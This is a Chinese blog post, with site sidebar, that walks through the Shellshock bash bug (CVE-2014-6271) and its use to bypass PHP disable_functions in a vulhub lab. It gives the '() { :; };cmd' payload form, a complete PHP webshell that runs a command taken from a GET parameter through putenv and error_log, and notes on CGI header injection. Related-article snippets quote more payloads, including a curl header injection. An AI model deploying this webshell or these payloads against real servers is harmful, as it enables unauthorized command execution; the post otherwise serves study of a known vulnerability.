【漏洞分析】CVE-2014-6271 Shellshock漏洞 bypass disable_functions

最新推荐文章于 2022-08-06 10:57:24 发布
最新推荐文章于 2022-08-06 10:57:24 发布
阅读量543 收藏 1
点赞数
分类专栏: PHP绕过 漏洞分析 文章标签: 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xia739635297/article/details/104699179
版权

这是前天就想写的,但是...是我懒了.

漏洞信息

小于4.3版本的bash会将以"(){"开头的环境变量解析为函数,解析后bash不会退出,会继续执行.故而可构造payload达到命令执行.

用的vulhub docker环境.其他环境搭建网上有很多了,我就不再写了.

本地利用

payload: 环境变量='() { :; };cmd;' 另起一进程.如下

 环境变量定义完毕后,必须要另起一进程(比如bash)才会触发(bash启动时会载入环境变量并解析,而bash在启动后设置新的环境变量并不会立即解析).

可以使用env查看环境变量设置情况

这里可以看到两次使用env命令.

第一次在使用env命令的同时定义NEW_VAR环境变量,可以在env结果中看到其存在.

第二次先定义NEW_VAR再调用env,但是env中没有NEW_VAR.

这是因为bash中每一行命令视作一个子进程,直接定义的环境变量只在那一个子进程中存在.

使用export定义的环境变量则可在当前shell中存在,如下.

使用export导入的恶意命令只会在当前进程创建子进程的时候触发,而当前进程的子进程创建子进程(孙子进程)的时候是不会触发的.

可以看到shellshock漏洞的利用还是很简单的.设置恶意环境变量,想办法打开一个子进程即可.

绕过disable_functions

上面可以看到,在存在shellshock漏洞的服务器上,如果我们能够设置恶意环境变量再打开一个子进程便可以执行任意命令.

只要php做到设置环境变量(putenv)与打开子进程(mail,error_log等函数),那么php就可以利用这个漏洞.

写一个php文件,运行如下

也可以用mail函数 ,如下

 php -n选项是不使用php.ini(这里是为了演示mail函数,就无视一下disable_functions)

成功绕过.

<?php
/**
 *Author:4ut15m
 *Filename:shellshock.php
 */

$cmd = $_GET['cmd'] . " > data.txt 2>&1";
@putenv("MY_CMD=() { :; };$cmd");

error_log("fine",1); //mail也可.
echo file_get_contents("data.txt");

?>

CGI

这个不是本文重点,简单说一下利用就好.

对于CGI程序来说,它会继承系统环境变量,而当http服务器调用CGI程序后,CGI程序又会多出以下环境变量(很多,我只列与客户端相关的一部分,与http报头含义差不多).

REMOTE_ADDR:客户机主机名

REMOTE_HOST:客户机IP地址

ACCEPT:客户端希望接收的数据类型

ACCEPT_ENCODING:客户机支持的解码方式

ACCEPT_LANGUAGE:客户机可接受语言的ISO代码

AUTORIZATION:被证实了的用户

REFFERER:从哪访问过来的

USER_AGENT:客户端浏览器的信息

可以看到CGI程序接收这些数据都是以环境变量的形式接收处理的. 并且CGI程序处理也会调用bash,如下程序.

由此,我们也可以构造请求(修改请求头就等于是修改环境变量)通过这个cgi程序执行命令,利用如下.

可以直接用curl

 

也可抓包再改

 

丶4ut15m
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2014-6271“破壳”漏洞利用过程
D-river博客
11-12 9091
前言CVE-2014-6271(即“破壳”漏洞)广泛存在与GNU Bash 版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口。实验环境攻击机:kali linux 目标机: Ubuntu ip: 10.10.10.129漏洞验证 Bash版本小于等于4.3可能存在漏洞
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
最新发布
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
PHP 5.x Shellshock Exploit (bypass disable_functions)
eT48_Sec
02-07 844
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) # Google Dork: none # Date: 10/31/2014 # Exploit Author: Ryan King (Starfall) # Vendor Homepage: http://php.net # Software Link:
破壳漏洞(CVE-2014-6271)综合分析
Star——Flying in the cyberspace
11-25 2883
目 录 一、 威胁卡片  二、 概述  三、 已知事件发布/披露情况 四、 漏洞的影响范围  五、 漏洞原理  六、 漏洞验证方法  七、 漏洞检测方法  八、 漏洞可能会带来的影响  九、 针对此漏洞的建议  十、 写在最后的啰嗦的话      一、     威胁卡片 二、概述        2014年9月24日Bash被公布存在远程代码执行漏洞,安天实验室
linux shellshock漏洞,shellshock漏洞原理分析(cve-2014-6271 bash漏洞)
weixin_40003283的博客
05-18 222
shellshock漏洞原理分析(cve-2014-6271 bash漏洞)2014-09-26 10:04:16阅读:0次概述:低于4.3版本的gnu bash存在漏洞,运行本地用户通过构造畸形命令执行额外的代码。细节:bash-4.1/variables.c 的 initialize_shell_variables() 函数负责解析临时环境变量中的函数定义并执行出,未验证特殊的环境变量情况,代...
CVE-2014-6271-bash shellshock-破壳漏洞复现
m0_62008601的博客
08-06 2972
这些变量可以包含代码,在shell被调用后会被立即执行。用docker搭建vulhub漏洞靶场,服务启动后,有两个页面http://192.168.217.134:8080/victim.cgi和http://192.168.217.134:8080/safe.cgi。可以看到错误原因都是permission denied,那就是权限不足的原因了,那我们就修改一下权限,让它能够被访问。既然在victim.cgi可以执行命令,那么应该就可以进行反弹shell了,kali开启端口监听,执行反弹shell命令。.
解决OpenSSL TLS 心跳扩展协议包远程信息泄露漏洞 (CVE-2014-0160)安全漏洞,升级OpenSSL到OpenSSL 1.0.1g
10-25
近期服务器开放的https的访问,确被安全组扫描出安全漏洞(OpenSSL TLS 心跳扩展协议包远程信息泄露漏洞 (CVE-2014-0160)),为修复该漏洞,升级OpenSSL到OpenSSL 1.0.1g,同时重新编译升级OpenSSH和nginx,在此提供...
破壳漏洞(CVE-2014-6271)综合分析1
08-04
4.1-3 4.3-9 4.3-9.1
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
BASH BUG:cve-2014-6271验证与利用
Linuxer's Blog Data
04-18 1487
来源:Mickey@360网络攻防实验室 Stephane Schazelas最近发现BASH的一个BUG,问题在于BASH在处理环境变量的时候,这个漏洞影响bash版本1.14 - 4.3, 受影响的发行版本包括:     Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution     C
php disable_function绕过
weixin_45794666的博客
03-03 3485
bypass disable_functions disable_functions是php.ini中的一个设置选项,可以用来设置PHP环境禁止使用某些函数,通常是网站管理员为了安全起见,用来禁用某些危险的命令执行函数等。 要进行添加的话在php.ini中添加即可,每个函数之间使用逗号隔开。 配置 打开php.ini,搜索disable_function,添加如下函数 eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_o
绕过disable_functions限制
kuaindl的博客
02-09 1058
作用:运维人员通过disable_functions函数来禁用一些在PHP中的一些“危险”函数,将其卸载php.in配置文件中。 例如: passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status, papen,ini_alter,ini_restore,dl,openlog,readlink,symlink,popepassthru,link等。 其实disable_function函数也就是一种黑名单限制机制
文件包含漏洞利用到绕过disable_function
m0_52400001的博客
01-24 2508
目标:​​​​​​http://115.126.12.38:90/ 当我打开这个网站发现空白界面什么都莫得有(就先随便看看吧),先右击查看一下源代码,我们发现出现#<!---- cat robots-back-hack.bak ----!>#, 试着去访问一下,发现可以下载,成功下载之后发现了两个禁止访问的目录,那么我们试着去使用7kb来进行扫描一下目录 通过扫描发现一个www.tar.gz的压缩包,我拿到linux服务器进行解压,查看,下面就是整个压缩包里面的文件了 下
shellshock漏洞利用
我的学习笔记
02-28 1152
echo $shell #查看当前用户的shell env x='() { :;}; echo vulnerable' bash -c "echo this is a test" #定义了一个名字叫x的变量,内容时单引号内的。 exploit:curl -H 'x: () { :;};a='/bin/mkdir /var/www/.ssh';echo ...
破壳(shellshock漏洞的一些汇总
瞎几把学
12-07 1519
原理与基本情况不再赘述 一、shellshock存在的环境 一个攻击者能够控制的环境变量,特别是该变量以 () { 开始。必须调用bash系统必须存在bash漏洞 二、目前证实适用的一些场景; CGI-based web server CGI处理文档请求的时候,使用环境变量处理请求,如果处理使用bash脚本,或者使用了系统调用,bash将接受系统变量并进行
Bypass_Disable_functions_Shell
weixin_33825683的博客
02-18 609
Bypass_Disable_functions_Shell https://github.com/l3m0n/Bypass_Disable_functions_Shell 一个各种方式突破Disable_functions达到命令执行的shell 防御 dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,i...
Bash 远程任意代码执行安全漏洞(最严重漏洞
weixin_34301132的博客
09-25 488
Bash 远程任意代码执行安全漏洞(最严重漏洞)如下命令来检查系统存在此漏洞:#envx='(){:;};echovulnerable'bash-c"echothisisatest" vulnerable thisisatest修复后结果#envx='(){:;};echovulnerable'bash-c"echoth...
PHP中执行系统命令(绕过disable_functions)
谢公子的博客
03-07 4546
PHP中执行系统命令 在PHP中,执行系统命令,有以下方式或方法: exec() shell_exec() system() passthru() popen() proc_open() pcntl_exec() :需要开启pcntl扩展 COM组件:Wscript.ShellShell.Application dl():通过加载自定义php扩展突破 disable_fucn...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值